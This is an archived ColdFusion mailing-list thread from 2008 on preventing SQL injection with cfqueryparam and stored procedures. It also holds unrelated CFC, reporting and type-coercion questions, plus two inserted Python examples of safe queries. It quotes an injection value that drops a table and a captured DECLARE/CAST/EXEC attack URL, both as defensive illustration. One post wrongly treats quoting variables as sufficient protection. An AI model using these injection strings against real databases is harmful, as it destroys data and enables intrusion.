Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309462


Re: Easy way to dump contents of a CFC?

2008-07-22 Thread Rich Kroll
 Is there an easy way to see the values stored in CFC?

In my CFCs I place all instance variables into an instance struct.  Then I
can use:

<cffunction name="getMemento" access="public" returntype="Struct" output="false">
    <cfargument name="collection" type="struct" required="false" default="#structNew()#">
    <cfset var Local = StructNew()>
    <cfloop collection="#variables.instance#" item="Local.i">
        <cfif StructKeyExists(variables.instance, Local.i)>
            <cfset arguments.collection[Local.i] = variables.instance[Local.i]>
        </cfif>
    </cfloop>
    <cfreturn arguments.collection>
</cffunction>

If you place everything in the variables scope, you can use:

<cffunction name="getMemento">
    <cfreturn duplicate(variables) />
</cffunction>

Keep in mind that this will also display all methods of the CFC as well.

 Does it work recursively, so if a cfc member points to another cfc
instance, then that cfc is dumped in the same way?

Unfortunately, any composite CFCs will display in their 'object'
representation, unless you build a recursive getMemento method, and each
child object would have to support that interface.

HTH,
Rich


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309463


Re: writing protected CF with CFStoredProc

2008-07-22 Thread morgan l
What's wrong with using:

<cfquery ...>
    exec sps_testproc
    <cfif whichvar EQ "A">
        @aid=<cfqueryparam value="123" cfsqltype="cf_sql_integer">
    <cfelse>
        @bid=<cfqueryparam value="456" cfsqltype="cf_sql_integer">
    </cfif>
</cfquery>


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309464


Re: writing protected CF with CFStoredProc

2008-07-22 Thread Qing Xia
Oh yeah, you are right, of course.  There is no NULL in CF so if I do a
Value=NULL that will only confuse SQL.

Cool, thanks!

On Tue, Jul 22, 2008 at 10:27 AM, Adrian Lynch [EMAIL PROTECTED]
wrote:

 Yup, you're making sense. The way around it is to pass NULL in using:

 <cfprocparam null="true">

 Adrian

 -Original Message-
 From: Qing Xia [mailto:[EMAIL PROTECTED]
 Sent: 22 July 2008 15:21
 To: CF-Talk
 Subject: writing protected CF with CFStoredProc


  Hello folks:

 The discussion yesterday regarding using CFqueryparam to protect sites from
 SQL Injection attacks got me thinking.  Well, it is easy enough to use
 CFQUERYPARAM everywhere inside CFQUERY tags, wherever a variable is passed
 to the SQL query.

 However, how do you do that with CFStoredProc?

 If I understand correctly, if you want to protect calls to stored procs
 (from SQL injection and the like), you have to use cfstoredproc and
 cfprocparam instead of cfquery and cfqueryparam.  But apparently, you can't
 indicate what parameters you're actually passing.  Am I missing something?

 Say you had a proc that looked like this:

 CREATE PROC sps_testproc
     @AID int = null,
     @BID int = null
 AS
     IF @AID IS NOT NULL
         SELECT @AID
     IF @BID IS NOT NULL
         SELECT @BID

 If I was using CFQUERY, unprotected-style, I might write this:

 <cfquery ...>
     sps_testproc
     <cfif whichvar EQ "A">
         @aid=123
     <cfelse>
         @bid=456
     </cfif>
 </cfquery>

 If I was using CFSTOREDPROC, I might write this:

 <cfstoredproc procedure="sps_testproc" ...>
     <cfprocparam type="in" cfsqltype="cf_sql_integer" value="123">
     ..
 </cfstoredproc>

 See my problem?  In my proc example, we don't need to know which of the two
 params is going to be passed to it.  In the CFQUERY, I use that to pass one
 param or the other depending on something else (the value of whichvar).
 But as far as I can tell, CFSTOREDPROC doesn't let me tell it which
 parameter I'm passing -- presumably it wants all parameters, in order.  So
 maybe I need something like this:

 <cfstoredproc procedure="sps_testproc" ...>
     <cfif whichvar EQ "A">
         <cfprocparam type="in" cfsqltype="cf_sql_integer" value="123">
         <cfprocparam type="in" cfsqltype="cf_sql_integer" value="null">
     <cfelse>
         <cfprocparam type="in" cfsqltype="cf_sql_integer" value="null">
         <cfprocparam type="in" cfsqltype="cf_sql_integer" value="456">
     </cfif>
 </cfstoredproc>

 That kind of sucks, right?  Am I making any sense?

 Any thoughts and/or suggestions?

 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309465


Re: writing protected CF with CFStoredProc

2008-07-22 Thread Qing Xia
True!  I can certainly do this as well.

On Tue, Jul 22, 2008 at 10:40 AM, morgan l [EMAIL PROTECTED] wrote:

 What's wrong with using:

 <cfquery ...>
     exec sps_testproc
     <cfif whichvar EQ "A">
         @aid=<cfqueryparam value="123" cfsqltype="cf_sql_integer">
     <cfelse>
         @bid=<cfqueryparam value="456" cfsqltype="cf_sql_integer">
     </cfif>
 </cfquery>


 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309466


Re: writing protected CF with CFStoredProc

2008-07-22 Thread Rich Kroll
In your example you are altering the behavior of the query based upon input
which does not affect injection attacks.  The idea of protecting against
injection attacks is to stop invalid values from being executed within the
query/SP.

Take for example this query:
delete from customer where customerId = 1

if this query were parameterized from CF without cfqueryparam you would
have:
delete from customer where customerId = #customerId#

If someone were trying to inject SQL they could pass "1;drop customers;"
as the parameter and, without the queryparam, it would be executed literally
as the following and drop the customers table:

delete from customer where customerId = 1;
drop customers;

To prevent this we utilize cfqueryparam which parameterizes the query that
is passed.  As I understand it, this informs the database that the value
being passed is of a specific datatype.  So in the previous example:

delete from customer where customerId = <cfqueryparam value="#customerId#" cfsqltype="cf_sql_integer" null="false" />

In essence, the database sees this as:
declare @custId int
set @custId = 1

delete from customer where customerId = @custId

This has the benefit of not allowing the additional SQL to be injected, and,
as I just learned recently, it also creates a parameterized query which on SQL
Server creates a cached query execution plan, minimally increasing
performance.

HTH,
Rich

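The parameterized-query behaviour Rich describes above, as an added example that is not from this thread: Python's sqlite3 stands in for cfqueryparam, the customer/customerId names are the thread's, the rows and the helper names (fresh_db, coerce_sql_integer and friends) are constructed here, and the injected text is the thread's "1;drop customers;" with "table" added so that SQLite will parse it.

```python
import sqlite3


def fresh_db() -> sqlite3.Connection:
    """Constructed sample data: the thread's customer table plus a second
    table named 'customers' that the injected statement tries to drop."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE customer (customerId INTEGER PRIMARY KEY, name TEXT);"
        "INSERT INTO customer VALUES (1, 'alice'), (2, 'bob');"
        "CREATE TABLE customers (id INTEGER);"
    )
    return con


def table_exists(con: sqlite3.Connection, name: str) -> bool:
    row = con.execute(
        "SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = ?",
        (name,),
    ).fetchone()
    return row[0] == 1


def delete_customer_unsafe(con: sqlite3.Connection, customer_id: str) -> None:
    """The '#customerId#' pattern from the thread: the request value is pasted
    into the SQL text, so a value carrying ';' becomes a second statement.
    executescript() is used because that is what a driver accepting
    multi-statement batches (SQL Server) does with the same string."""
    con.executescript(f"DELETE FROM customer WHERE customerId = {customer_id}")


def coerce_sql_integer(value, null: bool = False):
    """What cfqueryparam cfsqltype="cf_sql_integer" null="false" amounts to:
    the value is checked against the declared type before the database sees
    it, so text that is not an integer never gets near the SQL at all."""
    if value is None:
        if null:
            return None
        raise ValueError("NULL not allowed for this parameter")
    try:
        return int(str(value).strip())
    except ValueError:
        raise ValueError(f"not a cf_sql_integer: {value!r}") from None


def rejected_by_type_check(value) -> bool:
    """True when the integer parameter check refuses the value."""
    try:
        coerce_sql_integer(value)
        return False
    except ValueError:
        return True


def delete_customer_safe(con: sqlite3.Connection, customer_id) -> int:
    """Typed and bound, the equivalent of
        declare @custId int; set @custId = ...;
        delete from customer where customerId = @custId
    Returns the number of rows deleted."""
    cust_id = coerce_sql_integer(customer_id, null=False)
    cur = con.execute("DELETE FROM customer WHERE customerId = ?", (cust_id,))
    con.commit()
    return cur.rowcount


def count_by_name(con: sqlite3.Connection, name: str) -> int:
    """A cf_sql_varchar-style parameter: no type check can reject text, but a
    bound value is compared as a literal string, never parsed as SQL."""
    row = con.execute(
        "SELECT count(*) FROM customer WHERE name = ?", (name,)
    ).fetchone()
    return row[0]
```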

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309467


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger

2008-07-22 Thread Brian Yager
Mark,

I went to your site Coldfusionmuse to read about that attack.  I then noticed 
the link to cfwebtools at the top.  Needing some help with a project, I looked 
at one of the sites they helped create only to see that same SQL injection 
attack had succeeded on the site (www.rentiowa.com).  

Brian

This is a popular and very malicious SQL injection attack that is making the
rounds:

http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-ASCII

-Mark
 


Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

Just was looking at a 'user monitor' page on one of my sites and I saw the
url string below being called. I've seen several sql injection urls before,
but what the heck are they trying to accomplish here? Everything is
cfqueryparam'ed. Thanks, Che

/rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x[hex-encoded payload omitted] AS CHAR(4000));EXEC(@S);

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309468


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger

2008-07-22 Thread Experienced CF Developer
Okay, stupidly, I clicked on rent.com (? Used to avoid perpetuation) to
see what Brian was talking about and now I see the reference to a .js file
on one of the pages.  I didn't just infect my pc with something, did I?

I surely hope that we are not perpetuating some virus with these e-mails.  

Also, Brian, IMHO, I think your comment would have been more appropriate to
make off-list.

Sincerely,

Dave Phillips


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309469


Re: Report Builder Question

2008-07-22 Thread Carlos Juarez
Yes, it sucks that the option is not available for the entire band. For it to 
suppress the footer, you have to set all of the fields' "Remove line when 
blank" property to true in the footer section. Also, if there is blank space 
between your fields/lines, try adding dummy labels with just a space for the 
text value and place them between your blank sections of the footer, and be sure 
to set those fields' "Remove line when blank" to true as well.

Hope this helps.

-Carlos

 It does prevent the text from being displayed, but the whitespace is 
 still present. As far as I can see, there is no way to set that option 
 on the entire footer, just all of the contents inside the footer.
 
 Thanks for the suggestion. I'm happy to try any option!
 
 Hi,
 
 Try setting the footer text Remove line when blank property to true.
 
 
 -Carlos 


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309470


Re: DataSource Events like Before Commit?

2008-07-22 Thread Joseph Bugeja
Yes, I'll work on something like that but it requires heavy testing to make 
sure that the solution is correct. Pooling is quite a difficult and not very 
well documented topic (I could not find a document that explains how the 
ColdFusion driver is communicating with Oracle - like what if the pool size is 
set to 1 and there are two concurrent connections, then what happens with the 
Oracle session - does it open a session for each user or does it use 
time-sharing, etc.?). 

It could be the case that when I set the user id through a stored procedure, 
another user comes in, reusing an existing connection from the pool, and then 
that will mess up the authentication process. However, through transactions we 
are guaranteed that what is in the transaction is committed/rolled back as a 
block. The disadvantage with transactions is that they cannot be nested and 
they affect the performance. 

Why not just set it in their session and then you are only setting it once
and referencing that for each query you execute. 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309472


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Ma rk Kruger

2008-07-22 Thread Dave Watts
 Okay, stupidly, I clicked on rent.com (? Used to avoid 
 perpetuation) to see what Brian was talking about and now I 
 see the reference to a .js file on one of the pages.  I 
 didn't just infect my pc with something, did I?
 
 I surely hope that we are not perpetuating some virus with 
 these e-mails.

Having your browser request a .js file, by itself, should not be sufficient
to infect your machine with anything. However, that's largely up to you,
when you configure your machine.

First, ideally, you should not be logged into your machine as an
administrator. This prevents the execution of any code that will change the
operating system configuration (like viruses or malware in general).

In addition, arbitrary executables should not be allowed to install
something without requesting permission, so that even if you were logged in
as an administrator, you would be prompted to allow or deny the installation
of ActiveX controls or the like.

Based on my examination of one of the .js files yesterday, I doubt there's
any kind of harmful payload. It looks like the goal of the attack is click
fraud - driving up traffic where none would otherwise exist.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309473


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Ma rk Kruger

2008-07-22 Thread Dave Watts
 I went to your site Coldfusionmuse ...

Please send vulnerability discoveries to the appropriate individuals, not to
mailing lists.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309474


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger

2008-07-22 Thread Mark Kruger
Brian and all,

I apologize for that. The issue here is not negligence on the part of our
excellent team. The problem is that like a lot of dev shops - we don't keep
up with our portfolio of customers on our own web site. I have removed the
link to Rent Iowa. They have not been an active customer of ours for more
than 2 years - and we did not create any of the public facing pages on the
site. Still... Here I am with egg on my face.

-Mark

P.S. - I am expecting a call from them any moment now :)

Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

-Original Message-
From: Brian Yager [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, July 22, 2008 10:22 AM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark
Kruger

Mark,

I went to your site Coldfusionmuse to read about that attack.  I then
noticed the link to cfwebtools at the top.  Needing some help with a
project, I looked at one of the sites they helped create only to see that
same SQL injection attack had succeeded on the site (www.rentiowa.com).  

Brian

This is a popular and very malicious SQL injection attack that is 
making the
rounds:

http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-ASCII

-Mark
 


Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

Just was looking at a 'user monitor' page on one of my sites and I saw 
the url string below being called. I've seen several sql injection urls 
before, but what the heck are they trying to accomplish here? 
Everything is cfqueryparam'ed. Thanks, Che

/rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x[hex-encoded payload omitted] AS CHAR(4000));EXEC(@S);



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309475


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Ma rk Kruger

2008-07-22 Thread Mark Kruger
It's ok dave... I put myself out there after all 

-mark

-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, July 22, 2008 2:09 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Ma
rk Kruger

 I went to your site Coldfusionmuse ...

Please send vulnerability discoveries to the appropriate individuals, not to
mailing lists.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized instruction
at our training centers in Washington DC, Atlanta, Chicago, Baltimore,
Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309476


cfquery and cfstoredproc

2008-07-22 Thread Tim Do
I have been asked to look at a possible SQL injection attack. As I look
through the code I see stored procs being called by using cfquery like:

<cfquery name="asdf" datasource="asdf">
    storedproc '#var1#', '#var2#'
</cfquery>

I've read about using cfstored procs and params to prevent attacks.
I've read that using cfquery and doing inline queries can cause
injection attacks but I wasn't sure about using cfquery and calling a
stored proc through it. Can somebody please confirm?

Thanks!

Tim

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309477


RE: cfquery and cfstoredproc

2008-07-22 Thread Mark Kruger
Yes you are vulnerable if you do not sanitize the inputs. 


Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

-Original Message-
From: Tim Do [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, July 22, 2008 2:28 PM
To: CF-Talk
Subject: cfquery and cfstoredproc

I have been asked to look at a possible SQL injection attack. As I look
through the code I see stored procs being called by using cfquery like:

<cfquery name="asdf" datasource="asdf">
    storedproc '#var1#', '#var2#'
</cfquery>

I've read about using cfstored procs and params to prevent attacks.
I've read that using cfquery and doing inline queries can cause injection
attacks but I wasn't sure about using cfquery and calling a stored proc
through it. Can somebody please confirm?

Thanks!

Tim





Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309478


RE: cfquery and cfstoredproc

2008-07-22 Thread Gaulin, Mark
As you have heard, cfquery is vulnerable to sql injection attacks, so
you have to do something.

You will hear that cfqueryparam is the best practice for protecting
against sql injection attacks, and there is certainly truth to that.
However, there are also costs associated with cfqueryparam.  (Depending
on the version of CF, cfqueryparam disables cachedwithin caching.  In
all versions of CF, cfqueryparam effectively makes Sql Profiling with
SQL Server useless and there is no workaround.  This last issue is
nearly a show stopper for me.)

The code you show below puts single quotes around simple CF variables,
and in my book that provides pretty good protection from sql injection
attacks.  I have not yet heard of a case/argument that shows that the
single quote method, when used with simple CF variables, is not safe.
(Using the value of a function call or other expression in a cfquery can
lead to problems, possibly depending on the version of CF you are using.
The problems are due to the weird way that CF doubles single quotes in
variable values automatically.)

BTW, I do not know if there is a way to safely use a CF variable as part
of an ORDER BY clause, but I do know that single quotes there will not
work. (It is not valid SQL.)  So, code that takes ORDER BY clause
elements from url parameters are much tougher to protect and I think
should be avoided.

Thanks
Mark

-Original Message-
From: Tim Do [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, July 22, 2008 3:28 PM
To: CF-Talk
Subject: cfquery and cfstoredproc

I have been asked to look at a possible SQL injection attack. As I look
through the code I see stored procs being called by using cfquery like:

<cfquery name="asdf" datasource="asdf">
    storedproc '#var1#', '#var2#'
</cfquery>

I've read about using cfstored procs and params to prevent attacks.
I've read that using cfquery and doing inline queries can cause
injection attacks but I wasn't sure about using cfquery and calling a
stored proc through it. Can somebody please confirm?

Thanks!

Tim





Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309479


Re: cfquery and cfstoredproc

2008-07-22 Thread Brad Wood
(Depending
 on the version of CF, cfqueryparam disables cachedwithin caching.

This is true, but it doesn't prevent you from baking your own caching 
mechanism as many have done.

 In
 all versions of CF, cfqueryparam effectively makes Sql Profiling with
 SQL Server useless and there is no workaround.

Please explain what you mean. Are you saying you can't run a trace and see 
your SQL running? That is certainly not true. It may complicate seeing the 
value of your input parameters. Personally I use SeeFusion to watch my SQL 
traffic. I can debug a single user's IP and it shows me all the parameters 
being passed in.

 The code you show below puts single quotes around simple CF variables,
 and in my book that provides pretty good protection from sql injection
 attacks.  I have not yet heard of a case/argument that shows that the
 single quote method, when used with simple CF variables, is not safe.

Now you have:
http://www.codersrevolution.com/index.cfm/2008/7/13/Just-when-you-felt-safe-SQL-Injection-and-MySQL
http://www.coldfusionmuse.com/index.cfm/2008/5/16/disable-backslash-escape-on-mysql

 BTW, I do not know if there is a way to safely use a CF variable as part
 of an ORDER BY clause,

I outlined what I believe to be the only way to do this here:
http://www.codersrevolution.com/index.cfm/2008/7/22/When-will-cfqueryparam-NOT-protect-me

~Brad 


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309480


RE: cfquery and cfstoredproc

2008-07-22 Thread Mark Kruger
A couple of approaches to order by

http://www.coldfusionmuse.com/index.cfm/2008/7/21/SQL-injection-using-order-by


Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

-Original Message-
From: Brad Wood [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, July 22, 2008 3:46 PM
To: CF-Talk
Subject: Re: cfquery and cfstoredproc

(Depending
 on the version of CF, cfqueryparam disables cachedwithin caching.

This is true, but it doesn't prevent you from baking your own caching
mechanism as many have done.

 In
 all versions of CF, cfqueryparam effectively makes Sql Profiling with 
 SQL Server useless and there is no workaround.

Please explain what you mean. Are you saying you can't run a trace and see
your SQL running? That is certainly not true. It may complicate seeing the
value of your input parameters. Personally I use SeeFusion to watch my SQL
traffic. I can debug a single user's IP and it shows me all the parameters
being passed in.

 The code you show below puts single quotes around simple CF variables, 
 and in my book that provides pretty good protection from sql injection 
 attacks.  I have not yet heard of a case/argument that shows that the 
 single quote method, when used with simple CF variables, is not safe.

Now you have:
http://www.codersrevolution.com/index.cfm/2008/7/13/Just-when-you-felt-safe-SQL-Injection-and-MySQL
http://www.coldfusionmuse.com/index.cfm/2008/5/16/disable-backslash-escape-on-mysql

 BTW, I do not know if there is a way to safely use a CF variable as 
 part of an ORDER BY clause,

I outlined what I believe to be the only way to do this here:
http://www.codersrevolution.com/index.cfm/2008/7/22/When-will-cfqueryparam-NOT-protect-me

~Brad 




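For the ORDER BY problem raised in this thread (a bound parameter can only ever be a value, so it cannot name a column), an added example that is not from the thread or from the linked posts: the request value is used only as a key into a fixed allow-list, and the ORDER BY text is assembled from that list's own strings. Python with sqlite3 stands in for CFML, the table is the thread's customer table, and the rows and function names (order_by_clause, list_customers, sample_db) are constructed.

```python
import sqlite3

# The complete set of request values that may influence the ORDER BY text.
# The SQL fragments on the right are fixed strings written here; nothing
# taken from the request is ever spliced into the query.
SORTABLE_COLUMNS = {"id": "customerId", "name": "name"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def order_by_clause(sort: str, direction: str = "asc") -> str:
    """Translate request parameters into an ORDER BY clause by lookup only.
    Unknown values fall back to the default ordering instead of raising, so
    a request can pick one of the listed orderings and nothing else."""
    column = SORTABLE_COLUMNS.get(str(sort).strip().lower(), "customerId")
    dirn = DIRECTIONS.get(str(direction).strip().lower(), "ASC")
    return f"ORDER BY {column} {dirn}"


def list_customers(con, sort="id", direction="asc", name=None):
    """Filter values still travel as bound parameters (the cfqueryparam
    case); only the allow-listed ORDER BY fragment joins the SQL text."""
    sql = "SELECT customerId, name FROM customer"
    params = ()
    if name is not None:
        sql += " WHERE name = ?"
        params = (name,)
    sql += " " + order_by_clause(sort, direction)
    return con.execute(sql, params).fetchall()


def sample_db() -> sqlite3.Connection:
    """Constructed sample rows, deliberately inserted out of name order."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE customer (customerId INTEGER PRIMARY KEY, name TEXT);"
        "INSERT INTO customer VALUES (2, 'bob'), (1, 'carol'), (3, 'alice');"
    )
    return con
```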
Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309482


RE: cfquery and cfstoredproc

2008-07-22 Thread Adrian Lynch
I've used this function to view the SQL with the param data in place.

<cffunction name="executedSQL">
    <cfargument name="result">

    <cfset var LOCAL = {}>

    <cfset LOCAL.sqlString = ARGUMENTS.result.sql>

    <cfif StructKeyExists(ARGUMENTS.result, "sqlParameters")>
        <cfset LOCAL.params = ARGUMENTS.result.sqlParameters>
        <cfloop array="#LOCAL.params#" index="LOCAL.param">
            <cfif NOT IsNumeric(LOCAL.param)>
                <cfset LOCAL.param = "'" & LOCAL.param & "'">
            </cfif>
            <cfset LOCAL.sqlString = ReplaceNoCase(LOCAL.sqlString, "?", LOCAL.param, "ONE")>
        </cfloop>
    </cfif>

    <cfreturn "<pre>" & LOCAL.sqlString & "</pre>">
</cffunction>

cfquery name=testQuery datasource=yourDS result=r
SELECT *
FROM myTable
WHERE myColumn = cfqueryparam cfsqltype=CF_SQL_INTEGER
value=#someVar#
AND myOtherColumn = cfqueryparam cfsqltype=CF_SQL_VARCHAR
value=#anotherVar#
/cfquery

cfoutput#executedSQL(r)#/cfoutput

Adrian
www.adrianlynch.co.uk



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309481


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger

2008-07-22 Thread Brian Yager
You are correct, Dave.

Mark, I apologize for my post.  I thought it was interesting following the
links from the original thread to see a site with that exact attack.

Brian

 I went to your site Coldfusionmuse ...

Please send vulnerability discoveries to the appropriate individuals, not to
mailing lists.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information! 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309483


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger

2008-07-22 Thread Brian Yager
Mark,

I apologize for posting it the way I did.  I did find it interesting finding 
the exact attack on a site that was being discussed in the thread.  Please 
forgive me.

Brian

Brian and all,

I apologize for that. The issue here is not negligence on the part of our
excellent team. The problem is that like a lot of dev shops - we don't keep
up with our portfolio of customers on our own web site. I have removed the
link to Rent Iowa. They have not been an active customer of ours for more
than 2 years - and we did not create any of the public facing pages on the
site. Still... Here I am with egg on my face.

-Mark

P.S. - I am expecting a call from them any moment now :)

Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com


Mark,

I went to your site Coldfusionmuse to read about that attack.  I then
noticed the link to cfwebtools at the top.  Needing some help with a
project, I looked at one of the sites they helped create only to see that
same SQL injection attack had succeeded on the site (www.rentiowa.com).  

Brian 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309484


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger

2008-07-22 Thread Mark Kruger
Brian,

No worries. You just cost me an hour of my life approving changes to our
portfolio section (ha).

-mark 





Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309485


RE: cfquery and cfstoredproc

2008-07-22 Thread Gaulin, Mark
Hi Brad
Thanks for the links, those are interesting articles.

The problem with MS SQL Profiler and cfqueryparam is that the sql that
arrives at the sql server replaces the literal sql with something like
sp_exec 72 (I forget the actual sp name) followed by the parameters
(which are easily visible); the 72 is all that identifies the actual
sql statement and there is no way to convert 72 into the actual sql
statement... the id is valid only within the current connection.  

I use SQL profiler to find slow queries coming from anywhere in the
network, including the multiple web servers and other processes that run
our web site. It also shows lots of SQL server internal stats which make
debugging slow queries much, much easier... just having execution times
is not always helpful, and seeing all of the concurrently running
queries is pretty much required for complex cases.

What stinks is that all Adobe has to do is provide an alternative mode
for cfqueryparam that does not use binding (but does do other required
data validation), and I could enable it as I see fit. Then everyone in
the world could agree that cfqueryparam is great and should be used in
all cases. (I know, I know... implementing the required validation is
easier said than done. I didn't say it would be trivial to do.)

The other potential fix that I would absolutely live with is if the
sp_exec 72... SQL included a SQL comment that showed a form of the
original query.  That would be enough for me to go on.  This kind of
change would almost certainly require changes at or near the JDBC call
layer so, unless I can swap in a different JDBC driver, there isn't much
hope of doing this independently of Adobe. (Actually, it looks like it
is possible to use non-standard JDBC drivers... Hmm... I wonder what
kind of trouble I can get myself into with this capability.)

BTW, that MySQL hack with quoted back ticks sounds like hell.  I'm not
trying to start a MS SQL vs MySQL thing here, but damn, that really
sucks and probably makes a ton of web sites vulnerable. (And yes, this
does provide an example of when back ticks are insufficient, so now I
know.)

Thanks for the info.

Mark





Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309486


Re: cfquery and cfstoredproc

2008-07-22 Thread Brad Wood
Thanks Adrian.  That's cool.  However, it is not useful DURING the execution
of the SQL though, correct?

~Brad



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309487


('1,1') * 1 = 39448

2008-07-22 Thread Bert Dawson
I tracked down a defect to a piece of code which basically did the
following:

total = form.quantity * form.itemamount

In some cases, form.quantity is coming through as *1,1* which is presumably
due to an HTML issue with duplicate form fields with the same name.

But rather than getting a CF error because 1,1 isn't a number, it evaluates to
39448!

i.e.
<cfoutput>'1,1' * 1 = #'1,1' * 1#</cfoutput>
produces:
   '1,1' * 1 = 39448

I'm not worried about the original problem with the form.quantity coming
through as *1,1* rather than the expected *1* since I can fix that, but I'm
curious as to any reason for this odd result.

It looks like (x,y) * 1 is the same as (y,x) * 1
In other words
<cfoutput>#'5,23' * 1# = #'23,5' * 1# = 39591</cfoutput>

As I say, I'm not worried about fixing the defect, but I'm just curious if
there is an underlying explanation for the apparently weird behaviour. Or is
it just a bug in the way CF does the conversion?

Cheers
Bert

P.S. FWIW, here's a snippet which will create a 101-square grid of all the
combinations:

<cfscript>
function wtf(a, b) {
    var x = '#a#,#b#';
    try {
        // the multiplication is what triggers CF's string-to-number coercion
        return '#x#*1 = ' & x*1;
    }
    catch (any e) {
        return '#x#*1 pukes';
    }
}
</cfscript>

<table border="1">
<cfoutput>
<cfloop from="0" to="100" index="i">
<tr>
<cfloop from="0" to="100" index="j">
<td nowrap="true">#wtf(i,j)#</td>
</cfloop>
</tr>
</cfloop>
</cfoutput>
</table>


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309488


Re: cfquery and cfstoredproc

2008-07-22 Thread Brad Wood
I see.  Thanks for the clarification on the Profiler stuff. Unfortunately, I
don't have MSSQL in front of me to play with it right now.

I give SeeFusion two thumbs way up on monitoring your SQL traffic and run 
times.  (it incorporates a JDBC URL wrapper)  I use a custom monitor I wrote 
for SQL server 2005 that gets the execution plans for me of my running SQL 
that I tied into the SeeFusion API.  If I see a spike on the server, I can 
see who is doing it, what page they are on, what line of SQL is executing 
and what their execution plan is all at once.

~Brad


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309489


RE: ('1,1') * 1 = 39448

2008-07-22 Thread Experienced CF Developer
Looked like it could be a ColdFusion date value to me.  So I did a
dateFormat() on that and came up with 01/01/2008:

<cfset nValue = "1,1" * 1>
<cfoutput>#dateFormat(nValue, "mm/dd/yyyy")#<br><br></cfoutput>

It's assuming 1,1 is the current month and year.  I did the same for
5,23 * 1 and got 05/23/2008.

What's really fun is if you do 1,1 * 2..

